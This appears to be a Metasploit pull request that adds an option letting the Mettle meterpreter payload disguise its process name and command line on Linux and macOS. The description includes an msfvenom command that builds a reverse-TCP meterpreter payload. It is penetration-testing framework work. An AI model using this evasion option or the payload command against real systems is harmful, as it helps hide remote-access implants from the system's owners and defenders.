### PR TITLE
expose linux/osx meterpreter process hiding

### DIFF
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -66,6 +66,10 @@ module Msf
             OptInt.new(
               'SessionCommunicationTimeout',
               [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS]
+            ),
+            OptString.new(
+              'PayloadProcessCommandLine',
+              [ false, 'The displayed command line that will be used by the payload', '']
             )
           ],
           self.class

--- a/lib/msf/base/sessions/mettle_config.rb
+++ b/lib/msf/base/sessions/mettle_config.rb
@@ -65,6 +65,12 @@ module Msf
       end
 
       def generate_config(opts={})
+        ds = opts[:datastore] || datastore
+
+        if ds['PayloadProcessCommandLine'] != ''
+          opts[:name] ||= ds['PayloadProcessCommandLine']
+        end
+
         opts[:uuid] ||= generate_payload_uuid
 
         case opts[:scheme]
@@ -85,7 +91,7 @@ module Msf
         end
         opts[:session_guid] = Base64.encode64(guid).strip
 
-        opts.slice(:uuid, :session_guid, :uri, :debug, :log_file)
+        opts.slice(:uuid, :session_guid, :uri, :debug, :log_file, :name)
       end
 
     end


### PR DESCRIPTION
This exposes Mettle's native process rename functionality, which allows it to impersonate arbitrary processes and command line arguments.

## Verification

- [x] Generate a payload ` ./msfvenom -p osx/x64/meterpreter_reverse_tcp PayloadProcessCommandLine="monkey -n 123 -o howdy" LHOST=127.0.0.1 -f macho -o test.app`
- [x] **Verify** that when the process runs, the PS listing shows as `monkey -n 123 -o howdy` rather than test.app

